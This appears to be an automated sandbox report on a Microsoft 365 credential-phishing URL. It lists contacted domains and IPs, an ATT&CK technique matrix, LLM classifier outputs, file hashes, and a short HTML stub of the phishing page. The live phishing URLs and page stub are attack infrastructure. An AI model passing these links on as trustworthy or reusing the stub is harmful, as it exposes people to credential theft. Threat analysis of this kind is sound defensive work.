Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	3 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://ampa.fi/uEvMZCXCvX	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false		high
d2vgu95hoyrpkh.cloudfront.net	18.245.31.33	true	false		high
cs837.wac.edgecastcdn.net	192.229.133.221	true	false		high
ampa.fi	85.13.154.145	true	false		unknown
373939.multitudeofdreams.com	108.167.141.116	true	false		high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high
sni1gl.wpc.omegacdn.net	152.199.21.175	true	false		high
www.google.com	172.217.18.100	true	false		high
grastoonm3vides.com	188.114.96.3	true	false		high
aadcdn.msftauth.net	unknown	unknown	false		high
www.w3schools.com	unknown	unknown	false		high
cdn.socket.io	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
74.125.133.84	unknown	United States		15169	GOOGLEUS	false
13.107.246.45	s-part-0017.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.16.206	unknown	United States		15169	GOOGLEUS	false
142.250.186.163	unknown	United States		15169	GOOGLEUS	false
108.167.141.116	373939.multitudeofdreams.com	United States		46606	UNIFIEDLAYER-AS-1US	false
216.58.206.67	unknown	United States		15169	GOOGLEUS	false
172.217.18.3	unknown	United States		15169	GOOGLEUS	false
18.245.31.89	unknown	United States		16509	AMAZON-02US	false
18.245.31.33	d2vgu95hoyrpkh.cloudfront.net	United States		16509	AMAZON-02US	false
192.229.133.221	cs837.wac.edgecastcdn.net	United States		15133	EDGECASTUS	false
216.58.206.46	unknown	United States		15169	GOOGLEUS	false
142.250.186.106	unknown	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
188.114.97.3	unknown	European Union		13335	CLOUDFLARENETUS	false
18.245.31.5	unknown	United States		16509	AMAZON-02US	false
188.114.96.3	grastoonm3vides.com	European Union		13335	CLOUDFLARENETUS	false
152.199.21.175	sni1gl.wpc.omegacdn.net	United States		15133	EDGECASTUS	false
85.13.154.145	ampa.fi	Germany		34788	NMM-ASD-02742FriedersdorfHauptstrasse68DE	false
172.217.18.100	www.google.com	United States		15169	GOOGLEUS	false
172.217.16.131	unknown	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.16
192.168.2.4

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554557
Start date and time:	2024-11-12 16:57:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://ampa.fi/uEvMZCXCvX
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.phis.win@18/20@28/218

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.131, 74.125.133.84, 172.217.16.206, 34.104.35.123
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://ampa.fi/uEvMZCXCvX

LLM Input / Output

Input	Output
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://ampa.fi
URL: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Trying to sign in", "prominent_button_name": "Cancel", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://373939.multitudeofdreams.com
URL: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI Model: claude-3-haiku-20240307	```json { "brands": [] } ``` The provided image does not contain any visible brand logos or names. The image appears to be a login screen with the text "Trying to sign in" and a "Cancel" button, but no brand identifiers are present.

URL: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Sign in", "prominent_button_name": "Next", "text_input_field_labels": [ "Email, phone or Skype", "No account? Create one!", "Can't access your account?" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI Model: claude-3-haiku-20240307	```json { "brands": [ "Microsoft" ] }
	```json { "brands": [ "Microsoft" ] }
URL: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI Model: gpt-4o	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL '373939.multitudeofdreams.com' does not match the legitimate domain for Microsoft.", "The domain 'multitudeofdreams.com' is not associated with Microsoft and appears suspicious.", "The use of a subdomain '373939' and an unrelated main domain suggests a potential phishing attempt.", "The input fields mimic those commonly found on legitimate Microsoft login pages, which is a common phishing tactic." ], "riskscore": 9} Google indexed: False
URL: 373939.multitudeofdreams.com Brands: Microsoft Input Fields: Email, phone or Skype, No account? Create one!, Can't access your account?
URL: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Authenticating ...", "prominent_button_name": "Cancel", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI Model: claude-3-haiku-20240307	```json { "brands": [ "Microsoft" ] }
	```json { "brands": [ "Microsoft" ] }
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://multitudeofdreams.com

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:58:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.98459447590211
Encrypted:	false
SSDEEP:
MD5:	61F2C8ADCC09455845B8975FE2F5B64C
SHA1:	4423755A87F0E77660CEF87FC8B8F9CCB54AAFF2
SHA-256:	7D9A76A7C12D0C4E5A784629FD73CC2DE79C7A71CAA39D5E9C35E8ABCA58A351
SHA-512:	0B0860A35A4A0BBD3808EC381FB286C03B3D35D150384CF6B13DE3E499FC892FFEA075BCD3110763DA63B2DB76D87F602A86883BC41EB111AA1968CA0F0F72EE
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....]...5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY5.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY=.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY=.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY=............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlYA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:58:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9991003773250564
Encrypted:	false
SSDEEP:
MD5:	678B993EEA8129D02CCDDD31A4EF730C
SHA1:	29ED7B32C5CEC4E01780A51B739C8FA8B5CA4BC9
SHA-256:	9E4E82590134CB115221ED887059929637B8A3CC47E80A9772FAF678F6DC1129
SHA-512:	30772EAF4B4A6CD76799C230A5559257CA07F1E3EEAF7F29CD48AFEBEC837EDE74E938A6FD48C8B7F0D2A6E40CB9032D962602E40E48CD0A0FD8424FECC1E57F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....i....5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY5.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY=.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY=.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY=............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlYA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.007015499508517
Encrypted:	false
SSDEEP:
MD5:	F81DF8970BAFCB8473FDB9229DBBDAE6
SHA1:	A3FF6A7B2DB617764C9FEF2F43C897D556D420E2
SHA-256:	57AE6937177D36EE6031415ECB157AA8C159C492C7011DCF2F6700990BA7D4C9
SHA-512:	2BF91E31492D1FC3DECA0227E6A47EEFD24E2934F40CB9D9B99F949A48AC927605B008B08B1DCD4F7555BF1C663AB5F282802373C69110DAEC1638675296411F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY5.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY=.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY=.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY=............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:58:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.996127707108452
Encrypted:	false
SSDEEP:
MD5:	278CFEAD022280D9A8B25C254A495F21
SHA1:	791A356C51FB750EF78F61FDBDB2BDEC6D69B0B3
SHA-256:	E068759780DEA02FDA080A8213AB8B419472D93C5B25B395D0C94F324308E435
SHA-512:	3C4E80B820A56411437E062C41CC6811B86B3CA9926ADB42FE57D2258DA65AFA5B1A2797A219CE2EFF8419F0DA048A1CA8389416C890E2D0207ECD5D4C05D36D
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....:....5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY5.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY=.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY=.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY=............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlYA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:58:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.985755435676148
Encrypted:	false
SSDEEP:
MD5:	C43C0AF230F0A18606CC502C2485A7D9
SHA1:	8A300E6CF154F330A002EF4DB68E29A1A850FBE7
SHA-256:	8D68E63FD92E1AB5B311B825AB9C53CC354BB095E3036A0180A3637FD4D4C4C1
SHA-512:	470CF52CB7DBA3E01443E806A520BCCAB2C8CC0A795158B4E679869F1BA44F617664DA0229BCFCEC4CD589A746ABAF63B8F543E46355F006938E05C1EC5A646E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....T...5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY5.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY=.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY=.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY=............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlYA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:58:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9922648021443248
Encrypted:	false
SSDEEP:
MD5:	90E81793DF88C034B806AA6F7F267EBE
SHA1:	BAA4A77399C4A967B2E18BFB4A52FD15E75BBDCA
SHA-256:	E2A61532821E7FFF7CD2C41BE6A3DB2604900B87C0C5C25AB04430D748943CD1
SHA-512:	9C3356F382302DAE4E31F3CD11CD9E04560C114DE17E8B2A60EBF9BA105C89894F04BB88092B358A62684A029F5E5CFCF8618D78B7CBDEB40111F47B178CF331
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....1...5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY5.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY=.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY=.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY=............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlYA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 68

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	downloaded
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	unknown
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 69

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	366
Entropy (8bit):	5.591864901648614
Encrypted:	false
SSDEEP:
MD5:	AD88A3DC608D8D5C070AE3A2F06D7446
SHA1:	275A38DFB04A30A468D639BB2697913B93592194
SHA-256:	BFC7B35EC3C366AE0FC3D927E56094BD57667A872FF54F3A11EDCE632774CB88
SHA-512:	53B88690B6BF66E476D2EC1317E8DCD94A0EB1F44CBD8E885809F5B0CFD05F973F7D8785F802D0150663D5D39F0491C0781593EA462FFCEB3D8DB5A13658F6D0
Malicious:	false
Reputation:	unknown
URL:	https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI
Preview:	.<!DOCTYPE html>.<html id='html' sti='VlZORlVqQTBNVEV5TURJMFZURTFNVEV3TkRFeQ==' vic='' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>

Chrome Cache Entry: 71

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
Category:	dropped
Size (bytes):	276
Entropy (8bit):	7.316609873335077
Encrypted:	false
SSDEEP:
MD5:	4E3510919D29D18EEB6E3E8B2687D2F5
SHA1:	31522A9EC576A462C3F1FFA65C010D4EB77E9A85
SHA-256:	1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
SHA-512:	DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
Malicious:	false
Reputation:	unknown
Preview:	...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....e.......J).8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

Chrome Cache Entry: 72

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	downloaded
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	unknown
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 74

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	downloaded
Size (bytes):	23427
Entropy (8bit):	5.112735417225198
Encrypted:	false
SSDEEP:
MD5:	BA0537E9574725096AF97C27D7E54F76
SHA1:	BD46B47D74D344F435B5805114559D45979762D5
SHA-256:	4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
SHA-512:	FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
Malicious:	false
Reputation:	unknown
URL:	https://www.w3schools.com/w3css/4/w3.css
